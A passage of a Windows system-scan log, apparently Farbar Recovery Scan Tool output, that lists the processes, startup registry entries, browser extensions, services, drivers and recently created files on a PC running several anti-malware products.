Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe(SUPERAntiSpyware) D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe(Malwarebytes Corporation) D:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe(Malwarebytes Corporation) D:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe(Safer-Networking Ltd.) D:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe(Safer-Networking Ltd.) D:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe(Malwarebytes Corporation) D:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.24.15\GoogleCrashHandler.exe(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.24.15\GoogleCrashHandler64.exe(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avpui.exe(Panda Security) D:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe(Safer-Networking Ltd.) D:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe(Safer-Networking Ltd.) D:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM-x32\...\Run: [Malwarebytes Anti-Exploit] => d:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe [382608 2014-06-04] (Malwarebytes Corporation)HKLM-x32\...\Run: [uSB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2014-08-23] (Intel Corporation)HKLM-x32\...\Run: [updReg] => C:\Windows\UpdReg.EXE [90112 2000-05-11] (Creative Technology Ltd.)HKLM-x32\...\Run: [sound Blaster Z-Series Control Panel] => C:\Program Files (x86)\Creative\Sound Blaster Z-Series\Sound Blaster Z-Series Control Panel\SBZ.exe [735744 2013-02-27] (Creative Technology Ltd)HKLM-x32\...\Run: [sDTray] => d:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)HKLM-x32\...\Run: [CLVirtualDrive] => C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491120 2012-08-14] (CyberLink Corp.)HKLM-x32\...\Run: [CLMLServer_For_P2G8] => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [111120 2012-06-07] (CyberLink)HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2014-05-08] (Adobe Systems Incorporated)Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]HKU\S-1-5-21-4128547857-1153469887-4159291576-1001\...\Run: [sUPERAntiSpyware] => d:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7762712 2014-08-14] (SUPERAntiSpyware)HKU\S-1-5-21-4128547857-1153469887-4159291576-1001\...\Run: [Power2GoExpress8] => NALsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blankHKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-usHKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x8E16F0879864CA01HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blankHKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blankBHO: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)BHO: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)BHO: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)BHO: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)BHO-x32: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)BHO-x32: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)BHO-x32: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)BHO-x32: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/flashplayer/current/swflash.cabDPF: HKLM-x32 {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cabDPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/130321/CTPID.cabTcpip\Parameters: [DhcpNameServer] 192.168.1.254Tcpip\..\Interfaces\{5CEF61EB-1D9E-408E-AEA8-94B322F57FB5}: [NameServer] 208.67.222.222 FireFox:========FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll ()FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll ()FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)FF Plugin-x32: @microsoft.com/GENUINE -> disabled No FileFF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)FF HKLM-x32\...\Firefox\Extensions: [url_advisor@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.comFF Extension: 卡巴斯基網址顧問 - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com [2014-06-12]FF HKLM-x32\...\Firefox\Extensions: [virtual_keyboard@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.comFF Extension: 虛擬鍵盤 - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com [2014-06-12]FF HKLM-x32\...\Firefox\Extensions: [content_blocker@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.comFF Extension: 惡意網站攔截器 - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com [2014-06-12]FF HKLM-x32\...\Firefox\Extensions: [anti_banner@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.comFF Extension: Chặn quảng cáo - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com [2014-06-12]FF HKLM-x32\...\Firefox\Extensions: [online_banking@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.comFF Extension: Safe Money - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com [2014-06-12] Chrome: =======CHR HomePage: Default -> CHR Profile: C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\DefaultCHR Extension: (Google Drive) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-06-12]CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-12]CHR Extension: (Kaspersky Protection) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\blbkdnmdcafmfhinpmnlhhddbepgkeaa [2014-06-12]CHR Extension: (YouTube) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-06-12]CHR Extension: (Google Search) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-06-12]CHR Extension: (Kaspersky URL Advisor) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchlnpcodkpfdpacogkljefecpegganj [2014-06-12]CHR Extension: (Google Wallet) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-12]CHR Extension: (Gmail) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-06-12]CHR Extension: (Anti-Banner) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjldcfjmnllhmgjclecdnfampinooman [2014-06-12]CHR HKLM-x32\...\Chrome\Extension: [blbkdnmdcafmfhinpmnlhhddbepgkeaa] - https://chrome.google.com/webstore/detail/blbkdnmdcafmfhinpmnlhhddbepgkeaa [] CHR HKLM-x32\...\Chrome\Extension: [dchlnpcodkpfdpacogkljefecpegganj] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\urladvisor.crx [2013-06-17]CHR HKLM-x32\...\Chrome\Extension: [pjldcfjmnllhmgjclecdnfampinooman] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\ab.crx [2013-06-17] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 !SASCORE; d:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)R2 AVP; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe [214512 2014-06-12] (Kaspersky Lab ZAO)S3 Creative ALchemy AL6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\AL6Licensing.exe [79360 2014-06-12] (Creative Labs) [File not signed]S3 Creative Audio Engine Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2014-06-12] (Creative Labs) [File not signed]R2 CTAudSvcService; C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe [423424 2012-10-08] (Creative Technology Ltd) [File not signed]R2 CtHdaSvc; C:\Windows\sysWow64\CtHdaSvc.exe [112640 2013-07-03] (Creative Technology Ltd)R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)R2 MbaeSvc; d:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe [360592 2014-06-04] (Malwarebytes Corporation)R2 MBAMScheduler; d:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)R2 MBAMService; d:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)R2 SDScannerService; d:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)R2 SDUpdateService; d:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)R2 SDWSCService; d:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.) ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S3 AiChargerPlus; C:\Windows\SysWow64\drivers\AiChargerPlus.sys [14848 2013-01-28] (ASUSTek Computer Inc.)R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2014-07-13] ()S1 ASMTFilter; C:\Windows\System32\DRIVERS\asmtufdriver.sys [21400 2014-08-23] (http://www.asmedia.com.tw) [File not signed] S1 ASMTFilter; C:\Windows\SysWOW64\DRIVERS\asmtufdriver.sys [16640 2014-08-23] (http://www.asmedia.com.tw) [File not signed] R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [14464 2014-07-13] ()S3 ASUSFILTER; C:\Windows\SysWow64\drivers\ASUSFILTER.sys [46152 2011-09-19] (MCCI Corporation)S3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [170200 2013-03-27] (Broadcom Corporation.)R1 CLVirtualDrive; C:\Windows\System32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)R3 cthda; C:\Windows\System32\drivers\cthda.sys [1060632 2013-07-03] (Creative Technology Ltd)R3 cthdb; C:\Windows\System32\DRIVERS\cthdb.sys [34072 2013-07-03] (Creative Technology Ltd)R3 e1dexpress; C:\Windows\System32\DRIVERS\e1d62x64.sys [496400 2013-02-26] (Intel Corporation)R1 ESProtectionDriver; d:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae64.sys [62392 2014-06-04] ()R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2013-08-07] (Intel Corporation)R0 kl1; C:\Windows\System32\DRIVERS\kl1.sys [458336 2014-06-12] (Kaspersky Lab ZAO)S4 klflt; C:\Windows\System32\DRIVERS\klflt.sys [115296 2014-06-12] (Kaspersky Lab ZAO)R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [625248 2014-06-12] (Kaspersky Lab ZAO)R1 KLIM6; C:\Windows\System32\DRIVERS\klim6.sys [29792 2014-06-12] (Kaspersky Lab ZAO)R3 klkbdflt; C:\Windows\System32\DRIVERS\klkbdflt.sys [29280 2014-06-12] (Kaspersky Lab ZAO)R3 klmouflt; C:\Windows\System32\DRIVERS\klmouflt.sys [29280 2014-06-12] (Kaspersky Lab ZAO)R1 klpd; C:\Windows\System32\DRIVERS\klpd.sys [15456 2013-04-12] (Kaspersky Lab ZAO)R1 kltdi; C:\Windows\System32\DRIVERS\kltdi.sys [55904 2013-05-14] (Kaspersky Lab ZAO)R1 kneps; C:\Windows\System32\DRIVERS\kneps.sys [178272 2014-06-12] (Kaspersky Lab ZAO)R1 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [91352 2014-05-12] (Malwarebytes Corporation)R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation)R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-09-04] (Malwarebytes Corporation)R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-05-12] (Malwarebytes Corporation)R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)R1 SASDIFSV; d:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)R1 SASKUTIL; d:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)S3 Serial; C:\Windows\system32\drivers\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)S3 BCM42RLY; system32\drivers\BCM42RLY.sys [X]S3 Cpusat64; \??\C:\Program Files (x86)\Intel Corporation\Power Thermal Utility for Haswell DT-AIO-UPServer-Workstation Processor Rev. 1.1\Cpusat64.sys [X]S3 cpuz137; \??\C:\Windows\TEMP\cpuz137\cpuz137_x64.sys [X]S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X]S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X]S3 VGPU; System32\drivers\rdvgkmd.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-04 20:06 - 2014-09-04 20:06 - 00000000 ____D () C:\FRST2014-09-04 19:28 - 2014-09-04 19:28 - 00058832 _____ () C:\Users\Matthew Daubenspeck\AppData\Local\GDIPFONTCACHEV1.DAT2014-09-04 16:56 - 2014-09-04 19:52 - 00000224 _____ () C:\Windows\setupact.log2014-09-04 16:56 - 2014-09-04 16:56 - 00269128 _____ () C:\Windows\system32\FNTCACHE.DAT2014-09-04 16:56 - 2014-09-04 16:56 - 00000000 _____ () C:\Windows\setuperr.log2014-09-04 07:20 - 2014-09-04 07:20 - 00000643 _____ () C:\Users\Matthew Daubenspeck\Desktop\JRT.txt2014-09-04 07:02 - 2014-09-04 20:05 - 00067656 _____ () C:\Windows\WindowsUpdate.log2014-09-04 06:51 - 2014-09-04 07:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware2014-09-04 06:51 - 2014-09-04 06:51 - 00000862 _____ () C:\Users\Public\Desktop\SUPERAntiSpyware Professional.lnk2014-09-04 06:51 - 2014-09-04 06:51 - 00000538 _____ () C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 76f5f907-df54-4db7-8cca-e9da5ee3a2b2.job2014-09-04 06:51 - 2014-09-04 06:51 - 00000538 _____ () C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 138cf3f9-f67a-4f49-9f2a-da614f7f040b.job2014-09-04 06:51 - 2014-09-04 06:51 - 00000000 ____D () C:\Users\Matthew Daubenspeck\AppData\Roaming\SUPERAntiSpyware.com2014-09-04 06:51 - 2014-09-04 06:51 - 00000000 ____D () C:\ProgramData\SUPERAntiSpyware.com2014-09-04 06:18 - 2014-09-04 06:18 - 00001588 _____ () C:\Users\Matthew Daubenspeck\Desktop\firefox.exe - Shortcut.lnk2014-09-04 06:12 - 2014-09-04 06:12 - 00001058 _____ () C:\Users\Matthew Daubenspeck\Desktop\SUPERAntiSpyware.exe - Shortcut.lnk2014-09-04 01:24 - 2009-06-10 16:00 - 00000824 _____ () C:\Windows\system32\Drivers\etc\hosts.20140904-012447.backup2014-09-04 00:36 - 2014-09-04 00:36 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 22014-09-04 00:31 - 2014-09-04 00:31 - 00001054 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk2014-09-04 00:31 - 2014-09-04 00:31 - 00001054 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk2014-09-04 00:31 - 2014-09-04 00:31 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking2014-09-04 00:31 - 2014-09-04 00:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 22014-09-04 00:31 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe2014-09-03 21:57 - 2014-09-03 21:57 - 00000404 _____ () C:\Users\Matthew Daubenspeck\Documents\cc_20140903_215716.reg2014-09-03 21:48 - 2014-09-03 21:48 - 00001231 _____ () C:\Users\Matthew Daubenspeck\Desktop\HitmanPro_x64.exe - Shortcut.lnk2014-09-02 12:46 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL2014-09-02 12:46 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL2014-09-02 12:46 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL2014-09-02 12:46 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL2014-09-02 12:46 - 2014-07-08 21:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL2014-09-02 12:46 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDYAK.DLL2014-09-02 12:46 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDTAT.DLL2014-09-02 12:46 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU1.DLL2014-09-02 12:46 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU.DLL2014-09-02 12:46 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDBASH.DLL2014-09-02 12:46 - 2014-07-08 17:38 - 00419992 _____ () C:\Windows\system32\locale.nls2014-09-02 12:46 - 2014-07-08 17:30 - 00419992 _____ () C:\Windows\SysWOW64\locale.nls2014-08-30 02:33 - 2014-09-04 19:52 - 00000000 ____D () C:\ProgramData\NVIDIA2014-08-30 02:33 - 2014-07-02 15:48 - 00075040 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll2014-08-30 02:33 - 2014-07-02 15:48 - 00061912 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll2014-08-30 02:33 - 2014-07-02 13:55 - 06783776 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll2014-08-30 02:33 - 2014-07-02 13:55 - 03522392 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll2014-08-30 02:33 - 2014-07-02 13:55 - 00935368 _____ (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe2014-08-30 02:33 - 2014-07-02 13:55 - 00386520 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll2014-08-30 02:33 - 2014-07-02 13:55 - 00062808 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll2014-08-30 02:33 - 2014-07-02 12:44 - 00609240 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe2014-08-30 02:33 - 2014-07-02 05:14 - 03826628 _____ () C:\Windows\system32\nvcoproc.bin2014-08-30 02:32 - 2014-08-11 15:31 - 01515296 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdagenco6420103.dll2014-08-30 02:32 - 2014-08-11 15:31 - 00197408 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvhda64v.sys2014-08-30 02:32 - 2014-08-11 15:31 - 00031520 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdap64.dll2014-08-30 02:32 - 2014-07-02 15:48 - 31512520 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll2014-08-30 02:32 - 2014-07-02 15:48 - 24196896 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll2014-08-30 02:32 - 2014-07-02 15:48 - 22994208 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll2014-08-30 02:32 - 2014-07-02 15:48 - 18626304 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll2014-08-30 02:32 - 2014-07-02 15:48 - 17555104 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll2014-08-30 02:32 - 2014-07-02 15:48 - 16122344 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll2014-08-30 02:32 - 2014-07-02 15:48 - 15294296 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll2014-08-30 02:32 - 2014-07-02 15:48 - 14498552 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll2014-08-30 02:32 - 2014-07-02 15:48 - 13922752 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll2014-08-30 02:32 - 2014-07-02 15:48 - 13835208 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll2014-08-30 02:32 - 2014-07-02 15:48 - 12866008 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys2014-08-30 02:32 - 2014-07-02 15:48 - 11283344 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll2014-08-30 02:32 - 2014-07-02 15:48 - 11222048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll2014-08-30 02:32 - 2014-07-02 15:48 - 04247000 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll2014-08-30 02:32 - 2014-07-02 15:48 - 03989960 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll2014-08-30 02:32 - 2014-07-02 15:48 - 03196816 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll2014-08-30 02:32 - 2014-07-02 15:48 - 02814656 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll2014-08-30 02:32 - 2014-07-02 15:48 - 01890080 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6434052.dll2014-08-30 02:32 - 2014-07-02 15:48 - 01539928 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6434052.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00965312 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00944928 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00907096 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00903624 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00869152 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00846832 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00502232 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00418760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00391640 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00354016 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00348120 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00305600 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00166568 _____ (NVIDIA 